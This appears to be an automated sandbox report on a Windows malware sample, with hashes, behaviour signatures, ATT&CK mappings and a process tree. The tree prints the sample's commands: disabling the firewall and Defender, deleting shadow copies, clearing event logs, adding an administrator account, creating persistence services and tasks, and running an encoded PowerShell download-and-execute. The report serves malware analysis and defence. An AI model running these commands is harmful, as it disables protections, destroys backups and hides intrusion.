Analysis
-
max time kernel
53s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
03/05/2025, 15:32
Behavioral task
behavioral1
Sample
QueQtcK18.exe
Resource
win10v2004-20250502-en
General
-
Target
QueQtcK18.exe
-
Size
7.0MB
-
MD5
888de6f60367d5612ecddc1dd96229e1
-
SHA1
b888334a1b9caf8292966a8ac6aceffccb0f7045
-
SHA256
11e9d14bbff708d791c36da8ba71aa4eda882b56a85cd439cfbe98bf700cd9d3
-
SHA512
989047011fc3714d707e058faad9aceb0093eba6c3828e468d4ae51f8c25b458a189187c7ef69c5d2384d93cd3b3eb80fd80cd32e6e11876c3df5f8140c1518c
-
SSDEEP
98304:77BUGQ0nuaZ1j+LbCuZhCMYkcIt5FkOwSrIcUsLXRL2wbLp8FPg6XwKKmF:7VFuo1SPCurH/P/XRL4P2KKmF
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 2968 wevtutil.exe 2176 wevtutil.exe 2036 wevtutil.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
pid Process 2708 powershell.exe 4012 powershell.exe 3992 powershell.exe 2232 powershell.exe 3104 powershell.exe 436 powershell.exe 3472 powershell.exe 1592 powershell.exe 2344 powershell.exe 2132 powershell.exe 4008 powershell.exe -
Creates new service(s) 2 TTPs
-
Loads dropped DLL 6 IoCs
pid Process 4664 QueQtcK18.exe 4664 QueQtcK18.exe 4664 QueQtcK18.exe 4664 QueQtcK18.exe 4664 QueQtcK18.exe 4664 QueQtcK18.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4708 sc.exe 1208 sc.exe 2192 sc.exe 3396 sc.exe 8 sc.exe 2716 sc.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3176 ping.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3176 ping.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 212 schtasks.exe 4736 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 2708 powershell.exe 2708 powershell.exe 2344 powershell.exe 1592 powershell.exe 436 powershell.exe 3472 powershell.exe 3472 powershell.exe 1592 powershell.exe 1592 powershell.exe 3472 powershell.exe 2344 powershell.exe 2344 powershell.exe 436 powershell.exe 436 powershell.exe 4008 powershell.exe 4008 powershell.exe 2132 powershell.exe 2132 powershell.exe 3104 powershell.exe 3104 powershell.exe 3992 powershell.exe 3992 powershell.exe 2232 powershell.exe 2232 powershell.exe 4012 powershell.exe 4012 powershell.exe 2132 powershell.exe 3104 powershell.exe 3992 powershell.exe 4012 powershell.exe 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 62 IoCs
description pid Process Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 3472 powershell.exe Token: SeSecurityPrivilege 2036 wevtutil.exe Token: SeBackupPrivilege 2036 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2708 powershell.exe Token: SeSecurityPrivilege 2708 powershell.exe Token: SeTakeOwnershipPrivilege 2708 powershell.exe Token: SeLoadDriverPrivilege 2708 powershell.exe Token: SeSystemProfilePrivilege 2708 powershell.exe Token: SeSystemtimePrivilege 2708 powershell.exe Token: SeProfSingleProcessPrivilege 2708 powershell.exe Token: SeIncBasePriorityPrivilege 2708 powershell.exe Token: SeCreatePagefilePrivilege 2708 powershell.exe Token: SeBackupPrivilege 2708 powershell.exe Token: SeRestorePrivilege 2708 powershell.exe Token: SeShutdownPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeSystemEnvironmentPrivilege 2708 powershell.exe Token: SeRemoteShutdownPrivilege 2708 powershell.exe Token: SeUndockPrivilege 2708 powershell.exe Token: SeManageVolumePrivilege 2708 powershell.exe Token: 33 2708 powershell.exe Token: 34 2708 powershell.exe Token: 35 2708 powershell.exe Token: 36 2708 powershell.exe Token: SeSecurityPrivilege 2968 wevtutil.exe Token: SeBackupPrivilege 2968 wevtutil.exe Token: SeSecurityPrivilege 2176 wevtutil.exe Token: SeBackupPrivilege 2176 wevtutil.exe Token: SeDebugPrivilege 4008 powershell.exe Token: SeBackupPrivilege 2188 vssvc.exe Token: SeRestorePrivilege 2188 vssvc.exe Token: SeAuditPrivilege 2188 vssvc.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeIncreaseQuotaPrivilege 4012 powershell.exe Token: SeSecurityPrivilege 4012 powershell.exe Token: SeTakeOwnershipPrivilege 4012 powershell.exe Token: SeLoadDriverPrivilege 4012 powershell.exe Token: SeSystemProfilePrivilege 4012 powershell.exe Token: SeSystemtimePrivilege 4012 powershell.exe Token: SeProfSingleProcessPrivilege 4012 powershell.exe Token: SeIncBasePriorityPrivilege 4012 powershell.exe Token: SeCreatePagefilePrivilege 4012 powershell.exe Token: SeBackupPrivilege 4012 powershell.exe Token: SeRestorePrivilege 4012 powershell.exe Token: SeShutdownPrivilege 4012 powershell.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeSystemEnvironmentPrivilege 4012 powershell.exe Token: SeRemoteShutdownPrivilege 4012 powershell.exe Token: SeUndockPrivilege 4012 powershell.exe Token: SeManageVolumePrivilege 4012 powershell.exe Token: 33 4012 powershell.exe Token: 34 4012 powershell.exe Token: 35 4012 powershell.exe Token: 36 4012 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 812 wrote to memory of 4664 812 QueQtcK18.exe 86 PID 812 wrote to memory of 4664 812 QueQtcK18.exe 86 PID 4664 wrote to memory of 212 4664 QueQtcK18.exe 87 PID 4664 wrote to memory of 212 4664 QueQtcK18.exe 87 PID 4664 wrote to memory of 2708 4664 QueQtcK18.exe 89 PID 4664 wrote to memory of 2708 4664 QueQtcK18.exe 89 PID 4664 wrote to memory of 3064 4664 QueQtcK18.exe 90 PID 4664 wrote to memory of 3064 4664 QueQtcK18.exe 90 PID 3064 wrote to memory of 4708 3064 cmd.exe 93 PID 3064 wrote to memory of 4708 3064 cmd.exe 93 PID 4664 wrote to memory of 3996 4664 QueQtcK18.exe 94 PID 4664 wrote to memory of 3996 4664 QueQtcK18.exe 94 PID 3996 wrote to memory of 1208 3996 cmd.exe 96 PID 3996 wrote to memory of 1208 3996 cmd.exe 96 PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129 PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129 PID 2132 wrote to memory of 2192 2132 cmd.exe 101 PID 2132 wrote to memory of 2192 2132 cmd.exe 101 PID 4664 wrote to memory of 1312 4664 QueQtcK18.exe 102 PID 4664 wrote to memory of 1312 4664 QueQtcK18.exe 102 PID 1312 wrote to memory of 3396 1312 cmd.exe 104 PID 1312 wrote to memory of 3396 1312 cmd.exe 104 PID 4664 wrote to memory of 2344 4664 QueQtcK18.exe 106 PID 4664 wrote to memory of 2344 4664 QueQtcK18.exe 106 PID 4664 wrote to memory of 1592 4664 QueQtcK18.exe 107 PID 4664 wrote to memory of 1592 4664 QueQtcK18.exe 107 PID 4664 wrote to memory of 3472 4664 QueQtcK18.exe 108 PID 4664 wrote to memory of 3472 4664 QueQtcK18.exe 108 PID 4664 wrote to memory of 436 4664 QueQtcK18.exe 109 PID 4664 wrote to memory of 436 4664 QueQtcK18.exe 109 PID 4664 wrote to memory of 868 4664 QueQtcK18.exe 110 PID 4664 wrote to memory of 868 4664 QueQtcK18.exe 110 PID 868 wrote to memory of 8 868 cmd.exe 116 PID 868 wrote to memory of 8 868 cmd.exe 116 PID 1592 wrote to memory of 2036 1592 powershell.exe 117 PID 1592 wrote to memory of 2036 1592 powershell.exe 117 PID 4664 wrote to memory of 2952 4664 QueQtcK18.exe 118 PID 4664 wrote to memory of 2952 4664 QueQtcK18.exe 118 PID 3472 wrote to memory of 2968 3472 powershell.exe 120 PID 3472 wrote to memory of 2968 3472 powershell.exe 120 PID 436 wrote to memory of 2176 436 powershell.exe 122 PID 436 wrote to memory of 2176 436 powershell.exe 122 PID 2952 wrote to memory of 2716 2952 cmd.exe 124 PID 2952 wrote to memory of 2716 2952 cmd.exe 124 PID 4664 wrote to memory of 1064 4664 QueQtcK18.exe 128 PID 4664 wrote to memory of 1064 4664 QueQtcK18.exe 128 PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129 PID 4664 wrote to memory of 2132 4664 QueQtcK18.exe 129 PID 4664 wrote to memory of 3176 4664 QueQtcK18.exe 130 PID 4664 wrote to memory of 3176 4664 QueQtcK18.exe 130 PID 4664 wrote to memory of 3992 4664 QueQtcK18.exe 134 PID 4664 wrote to memory of 3992 4664 QueQtcK18.exe 134 PID 4664 wrote to memory of 4012 4664 QueQtcK18.exe 135 PID 4664 wrote to memory of 4012 4664 QueQtcK18.exe 135 PID 4664 wrote to memory of 3104 4664 QueQtcK18.exe 136 PID 4664 wrote to memory of 3104 4664 QueQtcK18.exe 136 PID 4664 wrote to memory of 2232 4664 QueQtcK18.exe 137 PID 4664 wrote to memory of 2232 4664 QueQtcK18.exe 137 PID 3104 wrote to memory of 3252 3104 powershell.exe 142 PID 3104 wrote to memory of 3252 3104 powershell.exe 142 PID 2232 wrote to memory of 1656 2232 powershell.exe 144 PID 2232 wrote to memory of 1656 2232 powershell.exe 144 PID 3252 wrote to memory of 2976 3252 net.exe 143 PID 3252 wrote to memory of 2976 3252 net.exe 143 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /tn MyPythonScript /tr "\"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe\" \"C:\Users\Admin\AppData\Local\Temp\_MEI8122\QueQtcK18.py\"" /sc onstart /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-NetFirewallProfile -Enabled False"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto"3⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\sc.exesc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto4⤵
- Launches sc.exe
PID:4708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "sc start OneLogon18"3⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\sc.exesc start OneLogon184⤵
- Launches sc.exe
PID:1208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto"3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\sc.exesc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto4⤵
- Launches sc.exe
PID:2192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "sc start MaliciousService"3⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\sc.exesc start MaliciousService4⤵
- Launches sc.exe
PID:3396
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "wevtutil cl Application"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\wevtutil.exe"C:\Windows\system32\wevtutil.exe" cl Application4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "wevtutil cl System"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\system32\wevtutil.exe"C:\Windows\system32\wevtutil.exe" cl System4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "wevtutil cl Security"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\wevtutil.exe"C:\Windows\system32\wevtutil.exe" cl Security4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto"3⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\system32\sc.exesc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto4⤵
- Launches sc.exe
PID:8
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "sc start MalwareService"3⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\sc.exesc start MalwareService4⤵
- Launches sc.exe
PID:2716
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe3⤵PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "schtasks /create /tn \"MaliciousTask\" /tr \"cmd.exe /c calc\" /sc daily /st 00:00"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn MaliciousTask /tr "cmd.exe /c calc" /sc daily /st 00:004⤵
- Scheduled Task/Job: Scheduled Task
PID:4736
-
-
-
C:\Windows\SYSTEM32\ping.exeping malicious-host.com3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-NetFirewallProfile -Enabled False"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "net user OneLogonFintUser password1234 /add"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user OneLogonFintUser password1234 /add4⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user OneLogonFintUser password1234 /add5⤵PID:2976
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "net localgroup Administrators OneLogonFintUser /add"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators OneLogonFintUser /add4⤵PID:1656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators OneLogonFintUser /add5⤵PID:4752
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe1⤵PID:3856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5b8f5272f1a630c61556ae3d396dc0a9a
SHA10fc3e0db215cdc31b8fb96caa989196916ee16eb
SHA256ef48366dbf9c8815c000644531758f59d72258dc8aabbbc2531265948e4656e2
SHA51207019777583138794ba2936e893e76acebba19841d41127da9ee6737843d385db1183639f468f5a582126cd325b7731afd230dfe55cbdcde31f8de26aa6c3be7
-
Filesize
64B
MD5a236b3d32301a8a69eb1facaee013c2c
SHA1e2797d2111ad7f584b538af1e8483c789b42c049
SHA256d539da2916ee368cf9ad8455f0e3705300fd9fa5f30e78b3c6e8f7821e778b22
SHA512c92ac75c33e501f4c95046e46175788574e2b4d159cb1158b8102d9f4c6b7e269e7df2fca4f43d60a68a35fbcd7b5e3b68ba44839320e5f801d9285ac83568a5
-
Filesize
64B
MD5534b7ac514f09b0ddb01d2c941131956
SHA18b981b197a789efd757fc7c964e8d7c151327138
SHA256ee5bdd4f5ff596a1dfec7e7abf31bed719b357d7f4eac10943b28ec5695a54f3
SHA51238067e3c8ec2231160a53f80b1398ff0c16edff6e3dc20dbb8b9082dc836958ddee08e06734287a6c5f2f537572bee69e9c7324a83a823791da596589467446e
-
Filesize
944B
MD5a10f29bd142d27667e3de4927bca93a2
SHA1f009910db810d3826add6fdbc5d2d06d30ab200d
SHA2566e37cf30b9188d04d5c2e5b9583a1cda02da6c86d4bd03c34c5cc80e6e8642f2
SHA512e2c93a19888bd000e9ad79a43ede8e77493a56db21ed19d385e2cd6e6da9d3edf34e5a83c49467d28d7a7ee89d90cdb30a2cc1c6dfd9b22d68c8bb356e8f79fa
-
Filesize
1KB
MD5f5a3c413511d951793530df77a555858
SHA1dc964e9ca86626b19b8047ab7a0af53d17a22f50
SHA25619664a8c1db4cd0215b35b6ca3983edb1e6e29b1f1720738d59fccb70c20cc56
SHA51261d9fb66854c1e506ece46ea79ec0bbba2caddb0a996f310ee1475877ce967e198ef453b0a0760d76ff4c67438db5f67c6ee18873f90f23f3926847ce8aba059
-
Filesize
64B
MD546f70064042d4347f3408c31a877c4f5
SHA1064ae10b4fc2318ea9666a2d6004f3836d0dad8d
SHA256e0fbe1727af5d6db4096e8c8a48b7c8ccb4865551c19522baa75fbf3cf95b29d
SHA51224882f6d5bc757b1893c0c1d82307df92e07e8bd2d4ab08ccd404c99abb2f308c42e8004f70fb895f8d109e9dbc890ccbbf7a5059f8d70ee6f1787aad8473ade
-
Filesize
64B
MD5f08bb5e6f49788531694ac01cd9df894
SHA181edea4b2997856fedc7e27efa12837926c3924b
SHA25624cb30bab5b03b374a25961abc5bb1f150be147e0922095997d761a9923e6606
SHA5122ab3d93f6a49bb67408e9f981742becd964338db13c54d6281318b383230d94d814a71bdb7a00c72c6233170ef4a9332a4e1aa633db44f21dfdcbb7578d31717
-
Filesize
64B
MD5b4c38c85d25f548e6bd2d16b79177c13
SHA17e22f257ab42981633783d1a8088b8837472a86f
SHA256feae36b7f9aeec516032dde1ffecf764622247dce7596d23449525887c52d532
SHA512dd74eab8d4b141921dfdcbbbb1a6df40c62c7aaa22b63d96bf9db4f3e851a635c77011b0c008b66daf277d93aea6a8678eff6bb939e83f3588e4b63d91ac1454
-
Filesize
117KB
MD532da96115c9d783a0769312c0482a62d
SHA12ea840a5faa87a2fe8d7e5cb4367f2418077d66b
SHA256052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4
SHA512616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087
-
Filesize
83KB
MD5684d656aada9f7d74f5a5bdcf16d0edb
SHA1f7586da90d101b5ee3fa24f131ee93ab89606919
SHA256449058efc99fccb9e24d640084d845c78f3f86dd34c5c126cf69e523d6320d75
SHA51227fb2eca382675316fb96d18a1aa6b2792077481bf899cbcc658d71f787876045c05c98abf129c9670b6a1d2654d57f59e17580139fa7f482ec27234e44d4235
-
Filesize
130KB
MD529873384e13b0a78ee9857604161514b
SHA1110f60f74b06b3972acd5908937a40e078636479
SHA2565c0d5082fba1a2a3eb8d5e23073be25164c19f21304b09cecaab340dc7198815
SHA512ca826ff5403700e6d8822634e364e43b14ef829095d8fe365b49731236f696fe86ffa3853cd1801dc3b7800d005a032fe23bbc25befe3952ef37790d56dee3c5
-
Filesize
273KB
MD521fcb8e3d4310346a5dc1a216e7e23ca
SHA1aab11aef9075715733e0fcde9668c6a51654b9e1
SHA2564e27c06b84401039d10f800a0f06446b58508784ee366c7c8324d8fe9794e1a5
SHA512c064550d1723e92512a42ce367ecef9331a81121305d66199abce6e0977152d927f7223f475e22c67e3f64b0f612c5553f112d8ce653c666a98d1980d200a599
-
Filesize
63KB
MD53e540ef568215561590df215801b0f59
SHA13b6db31a97115c10c33266cce8ff80463763c7e6
SHA25652f29aebe9886e830dedc363cd64eb53b6830d84b26e14f1b6faa655a0900b5d
SHA51221497a4d1d999a420ed0e146544f4149c72ad4aca4b869a0ee83267d92afa07609ece76a4e95ec706a21580d6544146d0a58c0baa01aa2c242474a4816108527
-
Filesize
155KB
MD5d63e2e743ea103626d33b3c1d882f419
SHA1af8a162b43f99b943d1c87c9a9e8088816263373
SHA25648f16b587c6faa44a9e073365b19599200b0f0a0ccb70121e76c2dac4ed53281
